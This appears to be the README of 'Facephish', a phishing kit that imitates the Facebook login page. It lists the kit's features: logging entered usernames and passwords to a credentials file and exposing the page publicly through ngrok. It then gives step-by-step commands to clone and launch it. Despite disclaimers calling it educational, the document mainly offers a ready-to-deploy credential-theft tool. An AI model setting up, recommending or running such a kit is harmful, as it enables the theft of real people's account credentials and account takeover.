⚠️ Disclaimer

This project is intended strictly for educational and ethical hacking awareness purposes only.

Do not use this project for malicious purposes.

The author does not condone illegal activity and is not responsible for any misuse.

Always conduct security testing only in authorized environments with explicit permission.

This repository is meant to help individuals and professionals understand phishing mechanics and learn how to defend against them.

📸 Preview#

Facephish Login Page

🚀 Features#

Fake Facebook login page styled like the real interface
Logs username and password attempts
Automatically generates public forwarding using ngrok
Logs output in real-time to console
Dynamic PHP server running on a random available 4-digit port

⚙️ Installation & Setup#

# 1. Clone this repository
git clone https://tangled.sh/@hatixntsoa.tngl.sh/facephish

# 2. Change to the project directory
cd facephish

# 3. Give execution permission to the script
chmod +x facephish.sh

# 4. Run the phishing server
./facephish.sh

✅ Ensure you have both PHP and ngrok installed on your system.

📁 Project Structure#

.
├── app/
│   └── facephish.php
├── assets/
│   ├── images/
│   ├── scripts/
│   └── styles/
├── data/
│   └── credentials.txt // saved credentials
├── logs/
├── screenshots/
├── utils/             // shell functions definition
├── index.html
├── facephish.sh
├── LICENSE.md
└── README.md

📌 Requirements#

PHP ≥ 7.x
ngrok with authenticated account (set up via ngrok authtoken)
Unix-like environment (Linux/macOS or WSL on Windows)

📚 Legal Note#

This repository is designed to demonstrate how phishing works, so that developers, companies, and users can better understand and protect themselves from real threats.

Use it ethically and legally.